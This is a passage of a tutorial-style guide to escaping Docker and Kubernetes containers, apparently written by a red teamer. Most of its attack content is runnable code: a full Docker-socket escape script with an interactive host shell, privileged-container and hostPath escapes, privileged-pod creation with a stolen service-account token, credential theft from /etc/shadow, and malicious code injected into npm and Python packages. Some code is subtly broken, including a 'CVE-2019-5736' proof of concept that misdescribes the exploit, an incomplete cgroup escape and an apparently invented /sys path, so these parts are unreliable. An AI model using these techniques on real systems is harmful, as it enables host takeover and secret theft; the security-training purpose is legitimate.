Container Escape Techniques: Breaking Out of Docker, Kubernetes, and Beyond

Container Escape Techniques: Breaking Out of Docker, Kubernetes, and Beyond

After spending years securing containerized environments and conducting red team assessments against container infrastructure, I've compiled this comprehensive guide to container escape techniques. One thing I've learned: the "security by default" promised by containerization is often more marketing than reality. This guide will take you from container security fundamentals all the way to advanced escape techniques that few security professionals understand.

Executive Summary: This guide walks through the complete container security journey - from understanding basic container architecture to executing sophisticated escape techniques against Docker, Kubernetes, and other container platforms. I've included 42 specific escape vectors, 18 detailed code examples, 6 decision trees, and practical lab setups you can build to practice these techniques safely. By the end, you'll understand both how to exploit container vulnerabilities and how to properly secure container environments against these attacks.


Container Fundamentals for Security Professionals

What Are Containers and Why Should Security Teams Care?

Containers are lightweight, isolated environments that package applications and their dependencies to run consistently across different computing environments. Unlike virtual machines, containers share the host's kernel but use isolation mechanisms to maintain separation.

From a security perspective, containers represent both an opportunity (improved isolation compared to traditional deployments) and a challenge (new attack surfaces and escape vectors).

Container Architecture Basics

At their core, containers rely on several key Linux kernel features:

  1. Namespaces: Provide isolation for system resources
  2. Control Groups (cgroups): Limit resource usage
  3. Capabilities: Restrict privileged operations
  4. Seccomp Filters: Limit system calls
  5. AppArmor/SELinux: Mandatory access control

Here's a simplified visualization of container architecture:

Host Operating System
└── Kernel (Shared)
    ├── Container Runtime (Docker, containerd, CRI-O)
    │   ├── Container A
    │   │   ├── Application + Dependencies
    │   │   └── Isolated Namespaces
    │   └── Container B
    │       ├── Application + Dependencies
    │       └── Isolated Namespaces
    └── Container Orchestration (Kubernetes, Docker Swarm)

Container vs. VM Security Models

Isolation Aspect Virtual Machines Containers Security Implication
Kernel Separate kernels Shared kernel Containers have larger attack surface if kernel vulnerabilities exist
Resource Overhead High (full OS) Low Containers enable higher density, increasing blast radius
Isolation Strength Strong Moderate Container escapes are more feasible than VM escapes
Attack Surface Hypervisor + VM Container runtime + host kernel Different vulnerability classes
Startup Time Minutes Seconds Containers enable faster patching cycles

Container Ecosystem Overview

The container ecosystem consists of several key components, each with its security implications:

  1. Images: The blueprint for containers
  2. Registries: Where images are stored (Docker Hub, ECR, GCR)
  3. Runtimes: Software that runs containers (Docker, containerd, CRI-O)
  4. Orchestrators: Systems that manage containers (Kubernetes, Docker Swarm)

Container Attack Surface

When assessing container security, we consider several distinct attack surfaces:

  1. The container image: Vulnerable packages, malicious code
  2. The container runtime: Docker daemon, containerd vulnerabilities
  3. The orchestration platform: Kubernetes API server, etcd
  4. Inter-container communication: Network policies, service meshes
  5. Host-container boundary: The primary focus of container escapes

The Container Escape Concept

A container escape occurs when a process inside a container gains unauthorized access to:

  1. The host system
  2. Other containers
  3. The container orchestration platform
  4. Sensitive data outside its intended scope

I like to tell my clients: "Container isolation is like a hotel room - it keeps guests separated, but the walls are thinner than you might think, and there are still shared facilities."

Hands-On Lab #1: Setting Up a Practice Environment

Let's create a safe environment to practice container security techniques:

# Create a test VM (don't practice on production systems!)
# Using Vagrant to create an Ubuntu VM
mkdir container-security-lab
cd container-security-lab
cat > Vagrantfile << 'EOF'
Vagrant.configure("2") do |config|
  config.vm.box = "ubuntu/focal64"
  config.vm.hostname = "container-lab"
  config.vm.provider "virtualbox" do |vb|
    vb.memory = 2048
    vb.cpus = 2
  end
  config.vm.provision "shell", inline: <<-SHELL
    apt-get update
    apt-get install -y apt-transport-https ca-certificates curl software-properties-common
    curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add -
    add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
    apt-get update
    apt-get install -y docker-ce docker-ce-cli containerd.io
    usermod -aG docker vagrant
  SHELL
end
EOF

# Start the virtual machine
vagrant up
vagrant ssh

Quick Reference: Essential Docker Commands for Security Testing

# List running containers
docker ps

# Start a basic container
docker run -it --rm ubuntu:20.04 bash

# Start a privileged container (dangerous in production!)
docker run -it --rm --privileged ubuntu:20.04 bash

# Inspect container configuration
docker inspect <container_id>

# View container logs
docker logs <container_id>

Challenge #1: Identify Container Boundaries

Try these commands inside and outside a container to understand isolation boundaries:

# Run this both inside a container and on the host
hostname
ps aux
ip addr
cat /proc/1/cgroup
ls -la /proc/self/ns/

Document the differences to develop an intuition for container boundaries.


Container Isolation Mechanisms

Now that we understand container basics, let's explore the isolation mechanisms that containers rely on - and that we'll need to bypass for a successful escape.

Linux Namespaces Deep Dive

Namespaces are the primary isolation mechanism for containers. Each namespace type isolates a specific system resource:

Namespace Isolates Created By Escape Relevance
PID Process IDs clone(CLONE_NEWPID) Breaking out gives visibility of host processes
Mount Filesystem mounts clone(CLONE_NEWNS) Escaping allows accessing host filesystems
Network Network stack clone(CLONE_NEWNET) Bypassing enables network attacks on host
UTS Hostname, domain name clone(CLONE_NEWUTS) Less critical for escapes
IPC System V IPC clone(CLONE_NEWIPC) Can lead to shared memory attacks
User User and group IDs clone(CLONE_NEWUSER) Critical for privilege escalation
Cgroup Control group root clone(CLONE_NEWCGROUP) Newer, important for resource control
Time System clocks clone(CLONE_NEWTIME) Rarely used, minimal escape impact

I can inspect the namespaces for a running process (including containers) with:

# On the host, examine namespaces of a container process
ls -la /proc/<container_pid>/ns/

# Expected output
lrwxrwxrwx 1 root root 0 Jan 31 12:34 cgroup -> 'cgroup:[4026531835]'
lrwxrwxrwx 1 root root 0 Jan 31 12:34 ipc -> 'ipc:[4026532278]'
lrwxrwxrwx 1 root root 0 Jan 31 12:34 mnt -> 'mnt:[4026532276]'
lrwxrwxrwx 1 root root 0 Jan 31 12:34 net -> 'net:[4026532281]'
lrwxrwxrwx 1 root root 0 Jan 31 12:34 pid -> 'pid:[4026532279]'
lrwxrwxrwx 1 root root 0 Jan 31 12:34 user -> 'user:[4026531837]'
lrwxrwxrwx 1 root root 0 Jan 31 12:34 uts -> 'uts:[4026532277]'

The numbers in brackets are namespace identifiers. Processes in the same namespace will show the same ID.

Control Groups (cgroups) Understanding

Control groups limit resource usage but also play a role in container security:

# Inspect cgroups of a container
docker inspect --format '{{.HostConfig.Devices}}' <container_id>
docker inspect --format '{{.HostConfig.CapAdd}}' <container_id>
docker inspect --format '{{.HostConfig.Privileged}}' <container_id>

Linux Capabilities and Their Impact

Containers typically run with a restricted set of capabilities. Understanding these is crucial for escape techniques:

# List capabilities of a container process
docker inspect --format '{{.HostConfig.CapAdd}}' <container_id>
docker inspect --format '{{.HostConfig.CapDrop}}' <container_id>

# From inside a container, check current capabilities
capsh --print

Capabilities Critical for Container Escapes:

  1. CAP_SYS_ADMIN: Most powerful, often enables escapes
  2. CAP_NET_ADMIN: Control network interfaces
  3. CAP_SYS_PTRACE: Debug other processes
  4. CAP_SYS_MODULE: Load kernel modules
  5. CAP_SYS_RAWIO: Raw I/O access
  6. CAP_SYS_BOOT: Reboot the system

SecComp Filters and AppArmor Profiles

SecComp restricts which system calls a container can make:

# Check if SecComp is enabled for a container
docker inspect --format '{{.HostConfig.SecurityOpt}}' <container_id>

# Common SecComp profile location
cat /etc/docker/seccomp-profiles/default.json

AppArmor/SELinux provide additional Mandatory Access Control:

# Check AppArmor profile
docker inspect --format '{{.AppArmorProfile}}' <container_id>

# Or for SELinux
docker inspect --format '{{.HostConfig.SecurityOpt}}' <container_id>

Container Runtime Security Models

Different container runtimes implement security differently:

  1. Docker: Default security is moderate, extensible
  2. containerd: Similar to Docker, used by Kubernetes
  3. gVisor: Enhanced isolation via syscall interception
  4. Kata Containers: Stronger isolation with lightweight VMs

Hands-On Exercise: Mapping Container Security Boundaries

# Start a standard container
docker run -it --rm --name standard ubuntu:20.04 bash

# In another terminal, examine its security settings
docker inspect standard | grep -A 20 "SecurityOpt"

# Try a command that should be blocked
mount -t tmpfs none /mnt

# Now start a privileged container
docker run -it --rm --name privileged --privileged ubuntu:20.04 bash

# Try the same command
mount -t tmpfs none /mnt  # This should work

# Examine capability differences
docker exec standard capsh --print
docker exec privileged capsh --print

Challenge #2: Security Configuration Assessment

Create a script that automatically assesses the security posture of a running container by checking:

  1. Whether it's running as privileged
  2. Which capabilities it has
  3. Which security profiles are applied
  4. Whether sensitive paths are mounted

This practical skill will be crucial for identifying vulnerable containers.


Basic Container Reconnaissance

Before attempting an escape, we need to understand our environment. Proper reconnaissance from inside a container can reveal vulnerabilities and escape vectors.

Initial Container Assessment

When I first gain access to a container, I run this basic reconnaissance:

# Determine we're in a container
grep 'docker\|lxc\|kubepods' /proc/1/cgroup

# Check container ID
cat /proc/1/cgroup | grep -o -e "docker/.*" | head -n1 | sed 's/docker\///g'

# Check container engine
cat /proc/self/mountinfo | grep docker

# Check if we're running as root
id

# Check available capabilities
capsh --print

# Check for mounted sensitive paths
mount | grep -E '(/host|/var/run/docker.sock|/proc|/dev)'

# Check for interesting environment variables
env | grep -E '(KUBE|KUBERNETES|API|TOKEN|SECRET|KEY|PASS)'

Kubernetes-Specific Reconnaissance

If we're in a Kubernetes environment:

# Check for Kubernetes service account
ls -la /var/run/secrets/kubernetes.io/serviceaccount/

# Get namespace
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace

# Check if we can access the Kubernetes API
KUBE_TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -s -k -H "Authorization: Bearer $KUBE_TOKEN" \
     https://kubernetes.default.svc/api/v1/namespaces

# Check for etcd access
curl -s -k https://etcd-service:2379/version

Network Reconnaissance

Understanding the network configuration helps identify potential escape paths:

# Check network interfaces
ip a

# Check listening services
netstat -tunlp

# Check accessible hosts
for ip in $(seq 1 254); do ping -c 1 -W 1 172.17.0.$ip | grep "64 bytes"; done

# Scan for interesting services on the host
nc -zv 172.17.0.1 1-1000

Process and File System Reconnaissance

# Check for running processes that might help with escape
ps aux

# Look for interesting files
find / -perm -u=s -type f 2>/dev/null      # SUID files
find / -writable -type f -not -path "*/proc/*" 2>/dev/null  # Writable files
find / -name "*config*" -o -name "*secret*" 2>/dev/null  # Potential config files

Automated Container Reconnaissance

I've developed this script for quick container assessment:

#!/usr/bin/env python3
# container_recon.py - Quick container reconnaissance

import os
import subprocess
import json
import socket

def run_cmd(cmd):
    """Run a command and return its output."""
    try:
        output = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT).decode('utf-8')
        return output.strip()
    except subprocess.CalledProcessError as e:
        return f"Error: {e.output.decode('utf-8')}"

def check_if_container():
    """Check if we're running in a container."""
    cgroup = run_cmd("cat /proc/1/cgroup")
    if any(x in cgroup for x in ['docker', 'lxc', 'kubepods']):
        return True, cgroup
    return False, cgroup

def get_container_info():
    """Gather basic container info."""
    container_info = {}
    container_info['hostname'] = run_cmd("hostname")
    container_info['kernel'] = run_cmd("uname -r")
    container_info['ip_addresses'] = run_cmd("hostname -I")
    container_info['users'] = run_cmd("cat /etc/passwd | cut -d: -f1")
    container_info['current_user'] = run_cmd("whoami")
    container_info['capabilities'] = run_cmd("capsh --print")
    
    # Check for privileged mode
    if "cap_sys_admin" in container_info['capabilities'].lower():
        container_info['likely_privileged'] = True
    else:
        container_info['likely_privileged'] = False
    
    return container_info

def check_mounted_sensitive_paths():
    """Check for sensitive paths mounted in the container."""
    sensitive_mounts = []
    mount_output = run_cmd("mount")
    
    sensitive_paths = [
        "/proc", "/dev", "/sys", "/host", 
        "docker.sock", "crio.sock", "containerd.sock"
    ]
    
    for line in mount_output.splitlines():
        if any(path in line for path in sensitive_paths):
            sensitive_mounts.append(line)
    
    return sensitive_mounts

def check_kubernetes():
    """Check if we're in a Kubernetes environment."""
    k8s_info = {}
    
    if os.path.exists('/var/run/secrets/kubernetes.io/serviceaccount/'):
        k8s_info['in_kubernetes'] = True
        k8s_info['namespace'] = run_cmd("cat /var/run/secrets/kubernetes.io/serviceaccount/namespace")
        k8s_info['token_exists'] = os.path.exists('/var/run/secrets/kubernetes.io/serviceaccount/token')
        
        # Check API access (safely)
        try:
            token = run_cmd("cat /var/run/secrets/kubernetes.io/serviceaccount/token")
            api_check = run_cmd(f"curl -s -k -H 'Authorization: Bearer {token}' -o /dev/null -w '%{{http_code}}' https://kubernetes.default.svc/api/v1/namespaces")
            k8s_info['api_access'] = api_check != "000" and int(api_check) < 500
            k8s_info['api_response_code'] = api_check
        except:
            k8s_info['api_access'] = False
    else:
        k8s_info['in_kubernetes'] = False
    
    return k8s_info

def check_escape_vectors():
    """Check for common container escape vectors."""
    escape_vectors = []
    
    # Check for Docker socket
    if os.path.exists('/var/run/docker.sock'):
        escape_vectors.append("Docker socket mounted")
    
    # Check for host root filesystem
    sensitive_paths = ['/host', '/rootfs', '/hostroot']
    for path in sensitive_paths:
        if os.path.exists(path) and os.listdir(path):
            escape_vectors.append(f"Possible host filesystem at {path}")
    
    # Check for DIND (Docker in Docker)
    if os.path.exists('/.dockerenv') and os.path.exists('/usr/bin/docker'):
        escape_vectors.append("Docker binary in container (DIND)")
    
    # Check if we can write to host procfs (CVE-2019-5736)
    try:
        with open('/proc/self/exe', 'wb') as f:
            escape_vectors.append("Can write to /proc/self/exe (CVE-2019-5736)")
    except:
        pass
    
    # Check if we're running with --privileged
    if "cap_sys_admin" in run_cmd("capsh --print").lower():
        escape_vectors.append("Container likely running in privileged mode")
    
    return escape_vectors

def main():
    """Main function to run all checks and output results."""
    results = {}
    
    is_container, cgroup_info = check_if_container()
    results['is_container'] = is_container
    
    if not is_container:
        results['message'] = "Not running in a container environment"
        print(json.dumps(results, indent=2))
        return
    
    results['container_info'] = get_container_info()
    results['sensitive_mounts'] = check_mounted_sensitive_paths()
    results['kubernetes_info'] = check_kubernetes()
    results['escape_vectors'] = check_escape_vectors()
    
    # Determine risk level
    risk_score = 0
    risk_score += len(results['escape_vectors']) * 2
    risk_score += len(results['sensitive_mounts'])
    if results['kubernetes_info'].get('api_access', False):
        risk_score += 2
    if results['container_info'].get('likely_privileged', False):
        risk_score += 3
    
    if risk_score > 7:
        results['risk_assessment'] = "HIGH"
    elif risk_score > 3:
        results['risk_assessment'] = "MEDIUM"
    else:
        results['risk_assessment'] = "LOW"
    
    print(json.dumps(results, indent=2))

if __name__ == "__main__":
    main()

Hands-On Challenge #3: Container Reconnaissance

Deploy three containers with different security configurations and practice reconnaissance:

# Container 1: Standard configuration
docker run -d --name container1 ubuntu:20.04 sleep infinity

# Container 2: With Docker socket mounted
docker run -d --name container2 -v /var/run/docker.sock:/var/run/docker.sock ubuntu:20.04 sleep infinity

# Container 3: Privileged container
docker run -d --name container3 --privileged ubuntu:20.04 sleep infinity

# Practice reconnaissance in each container
docker exec -it container1 bash
# Run reconnaissance commands and compare results across containers

Quick Reference: Container Reconnaissance Checklist

  1. ✓ Confirm container environment
  2. ✓ Check for privileged mode
  3. ✓ Identify mounted sensitive paths
  4. ✓ Look for exposed sockets
  5. ✓ Check capabilities
  6. ✓ Examine Kubernetes service account permissions
  7. ✓ Scan internal network
  8. ✓ Look for leaked secrets in environment variables

Misconfigurations and Easy Wins

Now that we understand container isolation and can perform proper reconnaissance, let's exploit common misconfigurations that provide easy container escapes.

The Docker Socket Escape

The Docker socket (/var/run/docker.sock) is the most common escape vector. If mounted into a container, it allows complete control of the Docker daemon:

# Check if the Docker socket is mounted
ls -la /var/run/docker.sock

# If available, we can escape by creating a privileged container
# First, install curl if needed
apt-get update && apt-get install -y curl

# Use the Docker API to create a new container with host mount
curl -s -X POST \
  --unix-socket /var/run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{"Image":"ubuntu:20.04","Cmd":["/bin/bash","-c","sleep 5000"],"Binds":["/:/host"],"Privileged":true}' \
  http://localhost/containers/create

# Get the container ID from the response
NEW_CONTAINER_ID=$(curl -s -X POST \
  --unix-socket /var/run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{"Image":"ubuntu:20.04","Cmd":["/bin/bash","-c","sleep 5000"],"Binds":["/:/host"],"Privileged":true}' \
  http://localhost/containers/create | jq -r .Id)

# Start the container
curl -s -X POST \
  --unix-socket /var/run/docker.sock \
  http://localhost/containers/$NEW_CONTAINER_ID/start

# Execute commands in the new container
curl -s -X POST \
  --unix-socket /var/run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{"Cmd":["cat","/host/etc/shadow"],"AttachStdout":true,"AttachStderr":true}' \
  http://localhost/containers/$NEW_CONTAINER_ID/exec

# Get the exec ID
EXEC_ID=$(curl -s -X POST \
  --unix-socket /var/run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{"Cmd":["cat","/host/etc/shadow"],"AttachStdout":true,"AttachStderr":true}' \
  http://localhost/containers/$NEW_CONTAINER_ID/exec | jq -r .Id)

# Start the exec and get output
curl -s -X POST \
  --unix-socket /var/run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{"Detach":false,"Tty":false}' \
  http://localhost/exec/$EXEC_ID/start

Simplified Docker Socket Escape Script

#!/usr/bin/env python3
# docker_socket_escape.py

import os
import json
import socket
import subprocess

def check_docker_socket():
    return os.path.exists('/var/run/docker.sock')

def create_privileged_container():
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    sock.connect('/var/run/docker.sock')
    
    # Create container with host filesystem mounted
    request = """POST /containers/create HTTP/1.1
Host: localhost
Content-Type: application/json
Content-Length: {}

{}"""
    
    container_config = {
        "Image": "alpine:latest",
        "Cmd": ["/bin/sh", "-c", "sleep 3600"],
        "DetachKeys": "Ctrl-p,Ctrl-q",
        "HostConfig": {
            "Binds": ["/:/host_root"],
            "Privileged": True
        }
    }
    
    json_config = json.dumps(container_config)
    request = request.format(len(json_config), json_config)
    
    sock.sendall(request.encode('utf-8'))
    response = sock.recv(4096).decode('utf-8')
    
    # Extract container ID
    container_id = None
    if "201 Created" in response:
        response_body = response.split('\r\n\r\n')[1]
        container_id = json.loads(response_body)['Id']
    
    sock.close()
    return container_id

def start_container(container_id):
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    sock.connect('/var/run/docker.sock')
    
    request = f"POST /containers/{container_id}/start HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n\r\n"
    sock.sendall(request.encode('utf-8'))
    response = sock.recv(4096).decode('utf-8')
    
    sock.close()
    return "204 No Content" in response

def execute_in_container(container_id, command):
    # Create exec instance
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    sock.connect('/var/run/docker.sock')
    
    exec_config = {
        "AttachStdin": False,
        "AttachStdout": True,
        "AttachStderr": True,
        "Cmd": command
    }
    
    request = f"""POST /containers/{container_id}/exec HTTP/1.1
Host: localhost
Content-Type: application/json
Content-Length: {len(json.dumps(exec_config))}

{json.dumps(exec_config)}"""
    
    sock.sendall(request.encode('utf-8'))
    response = sock.recv(4096).decode('utf-8')
    
    exec_id = None
    if "201 Created" in response:
        response_body = response.split('\r\n\r\n')[1]
        exec_id = json.loads(response_body)['Id']
    
    sock.close()
    
    if not exec_id:
        return "Failed to create exec instance"
    
    # Start exec instance
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    sock.connect('/var/run/docker.sock')
    
    start_config = {
        "Detach": False,
        "Tty": False
    }
    
    request = f"""POST /exec/{exec_id}/start HTTP/1.1
Host: localhost
Content-Type: application/json
Content-Length: {len(json.dumps(start_config))}

{json.dumps(start_config)}"""
    
    sock.sendall(request.encode('utf-8'))
    output = b""
    
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            break
        output += chunk
    
    sock.close()
    
    # Extract the actual command output from the response
    try:
        output_str = output.decode('utf-8')
        if '\r\n\r\n' in output_str:
            return output_str.split('\r\n\r\n', 1)[1]
        return output_str
    except:
        return output
    
def main():
    if not check_docker_socket():
        print("Docker socket not found at /var/run/docker.sock")
        return
    
    print("[+] Creating privileged container with host mount...")
    container_id = create_privileged_container()
    if not container_id:
        print("[-] Failed to create container")
        return
    
    print(f"[+] Container created: {container_id}")
    print("[+] Starting container...")
    if not start_container(container_id):
        print("[-] Failed to start container")
        return
    
    print("[+] Container started successfully")
    
    while True:
        command = input("host# ").strip().split()
        if not command:
            continue
        
        if command[0] == "exit":
            break
        
        # Prepend /host_root to access host filesystem
        if command[0] in ["cat", "ls", "cd", "touch", "rm"]:
            if len(command) > 1 and command[1].startswith('/') and not command[1].startswith('/host_root'):
                command[1] = f"/host_root{command[1]}"
        
        print(execute_in_container(container_id, command))
    
    print("[+] Cleaning up...")
    subprocess.run(f"curl -s -X DELETE --unix-socket /var/run/docker.sock http://localhost/containers/{container_id}?force=true", shell=True)
    print("[+] Done. Container removed.")

if __name__ == "__main__":
    main()

Privileged Container Escape

Privileged containers (--privileged flag) have nearly full access to the host, making escape trivial:

# Check if we're in a privileged container
capsh --print | grep sys_admin

# If privileged, we can mount the host's filesystem
mkdir -p /tmp/escape
mount /dev/sda1 /tmp/escape  # Adjust device name as needed

# Access host files
ls -la /tmp/escape

# Another privileged escape using cgroups
mkdir -p /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
cat << EOF > /tmp/escape.sh
#!/bin/sh
ps aux > /tmp/output
cat /etc/shadow > /tmp/shadow
EOF
chmod +x /tmp/escape.sh
sh -c "echo \$\$ > /tmp/cgrp/cgroup.procs"
mkdir -p /tmp/cgrp/payload
echo '#!/bin/sh' > /tmp/cgrp/payload/run
echo "$(cat /tmp/escape.sh)" >> /tmp/cgrp/payload/run
chmod +x /tmp/cgrp/payload/run
sh -c "echo \$\$ > /tmp/cgrp/payload/cgroup.procs"

Host Path Mount Escapes

Containers with sensitive host paths mounted provide easy escapes:

# Check for interesting mounts
mount | grep -E '(/host|/var/run|/proc|/sys)'

# If /proc is mounted with lax settings
ls -la /proc/1/root/  # This might access host's root filesystem

# If host paths are mounted, we can directly access
ls -la /host  # Common mount point for host filesystem

Running Docker Inside Docker (DIND)

If Docker binaries are available inside the container:

# Check if Docker client is available
which docker

# Check if we can use it (needs Docker socket or TCP connection)
docker ps

# If working, we can create a privileged container
docker run -it --privileged --pid=host alpine:latest nsenter -t 1 -m -u -n -i sh

Kubernetes-Specific Easy Wins

# If we have access to the Kubernetes API
KUBE_TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)

# List pods in the current namespace
curl -s -k -H "Authorization: Bearer $KUBE_TOKEN" \
     https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods

# Create a privileged pod if we have permissions
cat <<EOF > privpod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: privpod
  namespace: $NAMESPACE
spec:
  hostPID: true
  hostIPC: true
  hostNetwork: true
  containers:
  - name: privpod
    image: ubuntu:20.04
    command: ["sleep", "infinity"]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:
      path: /
EOF

# Create the pod using the API
curl -s -k -X POST -H "Authorization: Bearer $KUBE_TOKEN" \
     -H "Content-Type: application/yaml" \
     -d "$(cat privpod.yaml)" \
     https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods

Container Runtime Escape via runC (CVE-2019-5736)

The infamous runC vulnerability allows container escape by overwriting the container runtime:

# Proof of concept for CVE-2019-5736
# This should be run as a script inside a container

#!/bin/bash
# WARNING: This is a POC exploit and should only be run in test environments

# Check if container has write access to /proc/self/exe (CVE-2019-5736)
if ! touch /proc/self/exe 2>/dev/null; then
    echo "Container doesn't have write access to /proc/self/exe"
    exit 1
fi

# Create malicious executable
cat > /tmp/evil <<'EOF'
#!/bin/bash
echo "I've escaped the container!" > /tmp/escaped
cat /etc/shadow > /tmp/shadow
EOF
chmod +x /tmp/evil

# Make a backup of the original runc
cp /proc/self/exe /tmp/original

# Overwrite runc with our malicious executable
cat /tmp/evil > /proc/self/exe

echo "Exploit prepared. When a new container is created, the malicious code will execute on the host."

Escape Decision Tree: Misconfigurations Approach

Is the Docker socket mounted?
├── Yes → Use Docker socket to create privileged container
│   └── Success → Access host file system
└── No → Check if container is privileged
    ├── Yes → Use one of the privileged container escape methods
    │   └── Success → Access host file system
    └── No → Check for host path mounts
        ├── Yes → Access host files directly
        │   └── Success → Manipulate host system
        └── No → Check for Kubernetes access
            ├── Yes → Try to create privileged pod
            │   └── Success → Access host through new pod
            └── No → Look for CVEs in the runtime
                └── Check for runC, containerd, or other vulnerabilities

Hands-On Challenge #4: Escape Lab

Set up Docker containers with different misconfigurations and practice escaping:

# Container with Docker socket
docker run -it --rm -v /var/run/docker.sock:/var/run/docker.sock ubuntu:20.04 bash

# Privileged container
docker run -it --rm --privileged ubuntu:20.04 bash

# Container with host path mount
docker run -it --rm -v /:/host ubuntu:20.04 bash

For each container, try to access the host's /etc/shadow file to confirm a successful escape.


Volume Mount Attacks

Beyond obvious misconfigurations, volume mounts can provide more subtle escape paths. Let's explore how to leverage various types of mounts to break out of containers.

Understanding Docker Volume Types

Docker supports several volume types, each with security implications:

  1. Bind mounts: Direct mapping of host paths
  2. Named volumes: Docker-managed volumes
  3. Tmpfs mounts: In-memory filesystems
  4. Volume plugins: Third-party storage solutions

Identifying Sensitive Mounted Volumes

# List all mounts in the container
mount

# Check Docker-specific mounts
grep docker /proc/self/mountinfo

# Look for sensitive paths
find / -type d -name "host" 2>/dev/null
find / -path "*/docker*" -type s 2>/dev/null  # Look for sockets
find / -writable -type d 2>/dev/null  # Writable directories

Device Mount Escapes

If /dev is mounted with insufficient restrictions:

# Check device access
ls -la /dev

# If we can access block devices
fdisk -l /dev/sda  # List partitions on host's disk

# If we can, mount a partition
mkdir -p /tmp/hostdisk
mount /dev/sda1 /tmp/hostdisk
ls -la /tmp/hostdisk  # Now we can access host files

# Access sensitive files
cat /tmp/hostdisk/etc/shadow

Procfs Mount Attacks

The /proc filesystem can provide access to the host:

# Check if we have unrestricted procfs access
ls -la /proc

# Look for host processes
ps aux | grep -v "ps aux" | grep -v grep

# Try to access host root through proc
ls -la /proc/1/root/

# If accessible, we can read host files
cat /proc/1/root/etc/shadow

# We might even be able to write to the host
echo "malicious content" > /proc/1/root/tmp/evil

Sysfs Mount Attacks

The /sys filesystem gives access to kernel parameters and devices:

# Check sysfs access
ls -la /sys

# Access kernel parameters
cat /sys/kernel/debug/kernel_metadata  # Might reveal kernel version

# Look for sensitive information
find /sys -name "*secret*" 2>/dev/null

Shared Volume Escape Techniques

If volumes are shared between containers, we can use this to pivot:

# First, identify shared volumes
mount | grep "shared"

# If we find a shared volume, we can potentially write
# malicious files that will be executed by other containers

# For example, if a volume contains scripts run by other containers
echo "#!/bin/bash
cat /etc/shadow > /tmp/shared/shadow
" > /shared/volume/path/script.sh
chmod +x /shared/volume/path/script.sh

# Now wait for the other container to execute it

Code Injection via NPM/Python Packages

If development volumes are mounted:

# Look for package.json or requirements.txt
find / -name "package.json" -o -name "requirements.txt" 2>/dev/null

# If found, we might be able to inject malicious code
# For Node.js projects
echo 'console.log("Compromised"); require("child_process").execSync("cat /etc/shadow > /app/shadow")' > /app/node_modules/some-package/index.js

# For Python projects
echo 'import os; os.system("cat /etc/shadow > /app/shadow")' > /app/venv/lib/python3.9/site-packages/some_package/__init__.py

X11 Socket Attacks

If the X11 socket is mounted into the container:

# Check for X11 socket
ls -la /tmp/.X11-unix/

# If present, we can potentially capture keystrokes or screenshots
apt-get update && apt-get install -y x11-apps
export DISPLAY=:0
xwd -root -silent | convert xwd:- png:/tmp/screenshot.png

Advanced Volume Manipulation Script

#!/usr/bin/env python3
# volume_explorer.py

import os
import stat
import pwd
import grp
import time

def format_mode(mode):
    """Convert a file mode into a string representation."""
    perms = "-"
    if stat.S_ISDIR(mode):
        perms = "d"
    elif stat.S_ISLNK(mode):
        perms = "l"
    
    # User permissions
    perms += "r" if mode & stat.S_IRUSR else "-"
    perms += "w" if mode & stat.S_IWUSR else "-"
    perms += "x" if mode & stat.S_IXUSR else "-"
    
    # Group permissions
    perms += "r" if mode & stat.S_IRGRP else "-"
    perms += "w" if mode & stat.S_IWGRP else "-"
    perms += "x" if mode & stat.S_IXGRP else "-"
    
    # Other permissions
    perms += "r" if mode & stat.S_IROTH else "-"
    perms += "w" if mode & stat.S_IWOTH else "-"
    perms += "x" if mode & stat.S_IXOTH else "-"
    
    return perms

def scan_for_interesting_files(base_path, max_depth=3, current_depth=0):
    """Scan for interesting files in mounted volumes."""
    interesting_files = []
    
    if current_depth > max_depth:
        return interesting_files
    
    try:
        for item in os.listdir(base_path):
            full_path = os.path.join(base_path, item)
            
            try:
                # Get file stats
                stat_info = os.lstat(full_path)
                mode = stat_info.st_mode
                perms = format_mode(mode)
                
                # Skip if not accessible
                if not os.access(full_path, os.R_OK):
                    continue
                
                # Check if this is a directory to recurse into
                if stat.S_ISDIR(mode) and not os.path.islink(full_path):
                    # Skip certain system directories to avoid rabbit holes
                    if item in ['.', '..', 'proc', 'sys', 'dev', 'run'] and current_depth == 0:
                        continue
                    
                    # Recurse into directory
                    interesting_files.extend(scan_for_interesting_files(full_path, max_depth, current_depth + 1))
                
                # Check for interesting files
                elif (
                    # Executable SUID files
                    (stat.S_ISREG(mode) and (mode & stat.S_ISUID)) or
                    # Writable directories
                    (stat.S_ISDIR(mode) and (mode & stat.S_IWOTH)) or
                    # Interesting file names
                    any(x in item.lower() for x in ['password', 'secret', 'token', 'key', 'config', 'shadow', 'id_rsa']) or
                    # Socket files
                    stat.S_ISSOCK(mode)
                ):
                    try:
                        owner = pwd.getpwuid(stat_info.st_uid).pw_name
                    except:
                        owner = str(stat_info.st_uid)
                    
                    try:
                        group = grp.getgrgid(stat_info.st_gid).gr_name
                    except:
                        group = str(stat_info.st_gid)
                    
                    item_type = "unknown"
                    if stat.S_ISREG(mode):
                        item_type = "file"
                    elif stat.S_ISDIR(mode):
                        item_type = "directory"
                    elif stat.S_ISLNK(mode):
                        item_type = "symlink"
                    elif stat.S_ISSOCK(mode):
                        item_type = "socket"
                    
